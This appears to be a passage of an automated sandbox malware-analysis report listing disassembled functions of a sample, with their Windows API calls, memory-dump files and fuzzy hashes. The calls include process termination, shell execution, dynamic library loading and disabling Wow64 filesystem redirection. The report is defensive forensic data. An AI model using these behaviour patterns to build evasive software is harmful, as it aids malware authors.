            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
            • String ID:
            • API String ID: 43455801-0
            • Opcode ID: 9941f7e001f8555c53f8009c7aa1caa30d995aa8ffe397e4384ed9b6e6eb6374
            • Instruction ID: ec009a2cfcc889e8e4afa1670b19825683dcb79db3a80bf38f40d54d90c9f66c
            • Opcode Fuzzy Hash: 9941f7e001f8555c53f8009c7aa1caa30d995aa8ffe397e4384ed9b6e6eb6374
            • Instruction Fuzzy Hash: 6B111E7600014CBFEF119F94DC48E9A7F6DEB05350F00C052FA55A91A5C7769D55DF60
            Function 010051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
            Download Yara Rule
            APIs
            • GetDC.USER32(00000000), ref: 01005218
            • GetDeviceCaps.GDI32(00000000,00000058), ref: 01005229
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01005230
            • ReleaseDC.USER32(00000000,00000000), ref: 01005238
            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0100524F
            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 01005261
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CapsDevice$Release
            • String ID:
            • API String ID: 1035833867-0
            • Opcode ID: 999327794778f93a35406a923180a3b7d92fdb9026528b9cbb1bf87185fe381c
            • Instruction ID: e633878181738bc265813be8a1405fa04641d238fcdcb006208563712a22f3bb
            • Opcode Fuzzy Hash: 999327794778f93a35406a923180a3b7d92fdb9026528b9cbb1bf87185fe381c
            • Instruction Fuzzy Hash: E8018F75A00708BBFB109BA59D49A5EBFB8EF49351F044066FA45E7280D6759800DFA0
            Function 00FA1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
            Download Yara Rule
            APIs
            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA1BF4
            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA1BFC
            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA1C07
            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA1C12
            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA1C1A
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA1C22
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Virtual
            • String ID:
            • API String ID: 4278518827-0
            • Opcode ID: 4a12a09b9e7b978dacbe599518b425360a365a7382eb1ccaed3b075d91b30fd5
            • Instruction ID: 884863afebb483607a7e71a3f419c3cd385b034f4d31c120f7dd59d8855ea0aa
            • Opcode Fuzzy Hash: 4a12a09b9e7b978dacbe599518b425360a365a7382eb1ccaed3b075d91b30fd5
            • Instruction Fuzzy Hash: 9F016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
            Function 0100EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0100EB30
            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0100EB46
            • GetWindowThreadProcessId.USER32(?,?), ref: 0100EB55
            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100EB64
            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100EB6E
            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100EB75
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
            • String ID:
            • API String ID: 839392675-0
            • Opcode ID: 58b298237b98f82e56e0dc6b5199d31fc2e25fdc95c6b32ae4904928a2f0c15f
            • Instruction ID: b06d7f957ab65197791f80d5d8f617db2495ce972da676308cdd0ab13744ac68
            • Opcode Fuzzy Hash: 58b298237b98f82e56e0dc6b5199d31fc2e25fdc95c6b32ae4904928a2f0c15f
            • Instruction Fuzzy Hash: 96F01D72140558BBF63156629D0DEAB3A7CEBCBB11F00415AF641E1084D7A56A0197B5
            Function 00FF7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
            Download Yara Rule
            APIs
            • GetClientRect.USER32(?), ref: 00FF7452
            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FF7469
            • GetWindowDC.USER32(?), ref: 00FF7475
            • GetPixel.GDI32(00000000,?,?), ref: 00FF7484
            • ReleaseDC.USER32(?,00000000), ref: 00FF7496
            • GetSysColor.USER32(00000005), ref: 00FF74B0
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClientColorMessagePixelRectReleaseSendWindow
            • String ID:
            • API String ID: 272304278-0
            • Opcode ID: a0309f1e266b7469d976d5a78e06532422b393872a527a26589d63788c71bcc8
            • Instruction ID: de0721ee33fe93ac6f0f2151ede169f8f5448f3977a0a6428ffd1e3e4495c3ce
            • Opcode Fuzzy Hash: a0309f1e266b7469d976d5a78e06532422b393872a527a26589d63788c71bcc8
            • Instruction Fuzzy Hash: 47018F32400205EFEB20AF64DD08BA97BB9FF04321F500061FA55E20A0CB361D51BB10
            Function 01001874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
            Download Yara Rule
            APIs
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0100187F
            • UnloadUserProfile.USERENV(?,?), ref: 0100188B
            • CloseHandle.KERNEL32(?), ref: 01001894
            • CloseHandle.KERNEL32(?), ref: 0100189C
            • GetProcessHeap.KERNEL32(00000000,?), ref: 010018A5
            • HeapFree.KERNEL32(00000000), ref: 010018AC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
            • String ID:
            • API String ID: 146765662-0
            • Opcode ID: a793f1290b29d3e51eb0427701abb81fc7dc31c0fdf70dddc4a1e594760fa0ea
            • Instruction ID: 01f1a82b4669149f9d2bf2f118a81c5df638e4bcec6941830efa260aeac38123
            • Opcode Fuzzy Hash: a793f1290b29d3e51eb0427701abb81fc7dc31c0fdf70dddc4a1e594760fa0ea
            • Instruction Fuzzy Hash: 69E0E536004501BBEB115FA1EE0C90ABF3DFF4AB22B108222F265E1068CB379430EB50
            Function 0100C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0100C6EE
            • _wcslen.LIBCMT ref: 0100C735
            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0100C79C
            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0100C7CA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ItemMenu$Info_wcslen$Default
            • String ID: 0
            • API String ID: 1227352736-4108050209
            • Opcode ID: 51cc2ac6e02aa588f32da0ec8460c263a54f3d013e97753e747857150234246b
            • Instruction ID: 6e549c8a639fbf77ea662eeda5605909c7815c60f2d2811e93fe2174a8f7a2d5
            • Opcode Fuzzy Hash: 51cc2ac6e02aa588f32da0ec8460c263a54f3d013e97753e747857150234246b
            • Instruction Fuzzy Hash: D451D2716043009BF7A69E28CE45B6E7BE8BF49310F040BADFAD9D21D1DB74D9048B52
            Function 0102AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
            Download Yara Rule
            APIs
            • ShellExecuteExW.SHELL32(0000003C), ref: 0102AEA3
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
            • GetProcessId.KERNEL32(00000000), ref: 0102AF38
            • CloseHandle.KERNEL32(00000000), ref: 0102AF67
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseExecuteHandleProcessShell_wcslen
            • String ID: <$@
            • API String ID: 146682121-1426351568
            • Opcode ID: 8c3b2c01d65095a9bcad8a7c511e0f8d26c6e9ddc14110fe2ab5329b3636b8da
            • Instruction ID: 548dffc3e22457fbeab4f010a1244cc1a6c8d5850226bb446587cb04c1552444
            • Opcode Fuzzy Hash: 8c3b2c01d65095a9bcad8a7c511e0f8d26c6e9ddc14110fe2ab5329b3636b8da
            • Instruction Fuzzy Hash: 72717B71A00625DFCB14EF54C884A9EBBF4FF09310F048499E856AB792CB79ED45CB90
            Function 0100719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
            Download Yara Rule
            APIs
            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01007206
            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0100723C
            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0100724D
            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 010072CF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$AddressCreateInstanceProc
            • String ID: DllGetClassObject
            • API String ID: 753597075-1075368562
            • Opcode ID: c96615e69125ec8e0021bd9595a2fec3d1c4b939f2b0da6e4042bfab3b2e033f
            • Instruction ID: fc38c9aa9bb173a2a4bfbb08c880119bdb3c1fbe90d15afca4b7b8be9c8fedcb
            • Opcode Fuzzy Hash: c96615e69125ec8e0021bd9595a2fec3d1c4b939f2b0da6e4042bfab3b2e033f
            • Instruction Fuzzy Hash: 38416E71A00204AFEB26CF54C984A9A7FB9EF45310F1580A9BD859F249D7B9E944CBA0
            Function 01033D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
            Download Yara Rule
            APIs
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01033E35
            • IsMenu.USER32(?), ref: 01033E4A
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01033E92
            • DrawMenuBar.USER32 ref: 01033EA5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Item$DrawInfoInsert
            • String ID: 0
            • API String ID: 3076010158-4108050209
            • Opcode ID: ed2fd2bd65fe7c62ad46d8fff213c26be9020c63763d6af2e60ec57eafa689ab
            • Instruction ID: 0f4dd0521953bc108adc3bcae366e2491319b3f7c53b5f420654407acd06c6ed
            • Opcode Fuzzy Hash: ed2fd2bd65fe7c62ad46d8fff213c26be9020c63763d6af2e60ec57eafa689ab
            • Instruction Fuzzy Hash: 9C416875A00209AFEB20DF54D8C4EAABBF9FF89350F044169E985AB280D735A945CF60
            Function 01001DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01001E66
            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01001E79
            • SendMessageW.USER32(?,00000189,?,00000000), ref: 01001EA9
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$_wcslen$ClassName
            • String ID: ComboBox$ListBox
            • API String ID: 2081771294-1403004172
            • Opcode ID: e89e86f3ec283adb9a9f199226da2ae453c105bc37c917e2b33c0b92a449f739
            • Instruction ID: 5855c9b5738d9f7e30bf2d90288bcfaf4ca916619529090e57eba340e2da2509
            • Opcode Fuzzy Hash: e89e86f3ec283adb9a9f199226da2ae453c105bc37c917e2b33c0b92a449f739
            • Instruction Fuzzy Hash: 80212671A00108AEFB159B65DD45CFFBBBCEF46390F044129F491A71D1DB7889099A20
            Function 01032F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01032F8D
            • LoadLibraryW.KERNEL32(?), ref: 01032F94
            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01032FA9
            • DestroyWindow.USER32(?), ref: 01032FB1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$DestroyLibraryLoadWindow
            • String ID: SysAnimate32
            • API String ID: 3529120543-1011021900
            • Opcode ID: 693a25562084f829271550ebe83f13680cd824b7c0d1de37b2624322f3cca07f
            • Instruction ID: c80230d4c08d0f0bf2f4ad3e6b6b8fdffff173a035507d74099fa31a30d1744f
            • Opcode Fuzzy Hash: 693a25562084f829271550ebe83f13680cd824b7c0d1de37b2624322f3cca07f
            • Instruction Fuzzy Hash: D1219D72204209AFEB214E68DC80EBB7BEDEF89364F104629FA90E6195D771DC919760
            Function 00FC4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FC4D1E,00FD28E9,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002), ref: 00FC4D8D
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FC4DA0
            • FreeLibrary.KERNEL32(00000000,?,?,?,00FC4D1E,00FD28E9,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002,00000000), ref: 00FC4DC3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 457420fa2f24e7289c4e8e0365e9609ae2fdd6f03d7540801466b8bf7a513a5b
            • Instruction ID: b712db7bfa949e0371d8673f5dcd7afdbc9e916a48bc008786e154619c3cd036
            • Opcode Fuzzy Hash: 457420fa2f24e7289c4e8e0365e9609ae2fdd6f03d7540801466b8bf7a513a5b
            • Instruction Fuzzy Hash: D1F0A435900209BBEB209F90D94AFEDBBB8EF04711F0000A9F946F2154CB795A40DB91
            Function 00FFD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32 ref: 00FFD3AD
            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FFD3BF
            • FreeLibrary.KERNEL32(00000000), ref: 00FFD3E5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: GetSystemWow64DirectoryW$X64
            • API String ID: 145871493-2590602151
            • Opcode ID: 5e5cc8e4d64f2d3b550233578d301566debc78b605f58d11c9651e76a10037d1
            • Instruction ID: b9fb2a46e26b217caac3291e5ada38df9284284087d906d58ebd6234085f9bb7
            • Opcode Fuzzy Hash: 5e5cc8e4d64f2d3b550233578d301566debc78b605f58d11c9651e76a10037d1
            • Instruction Fuzzy Hash: AAF05533C026299BF7305A10CC58A793369AF12B15B54804AF782F2128DB30CD40BBC3
            Function 00FA4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E9C
            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4EAE
            • FreeLibrary.KERNEL32(00000000,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EC0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
            • API String ID: 145871493-3689287502
            • Opcode ID: a0d57bbad9b1182baffd9114ade432610e6803f270f5c5ffb56ad3715c7ed0f8
            • Instruction ID: b0e6266b5c58c2eb1588b4b65f35548477a31fc7f14ff7f86adfa94849a8879b
            • Opcode Fuzzy Hash: a0d57bbad9b1182baffd9114ade432610e6803f270f5c5ffb56ad3715c7ed0f8
            • Instruction Fuzzy Hash: D3E08636E025225BE2311725A928A5B755CAFC3B72B050116FC45F6104DBA4DC0161E0
            Function 00FA4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E62
            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4E74
            • FreeLibrary.KERNEL32(00000000,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E87
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
            • API String ID: 145871493-1355242751
            • Opcode ID: 5d072385222a7775013b6fb2e41e4f1d37c1415780c0c9c3817fb4fe4b33929b
            • Instruction ID: ade4310be618260c25a5cbb870219e02861f5348712b4b7a7fb1897dd5216e38
            • Opcode Fuzzy Hash: 5d072385222a7775013b6fb2e41e4f1d37c1415780c0c9c3817fb4fe4b33929b
            • Instruction Fuzzy Hash: 95D0123690262157A6321B257918E8B7A5CAFC7B613050516B945F6108CFA5ED01A6D0
            Function 0102A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
            Download Yara Rule
            APIs
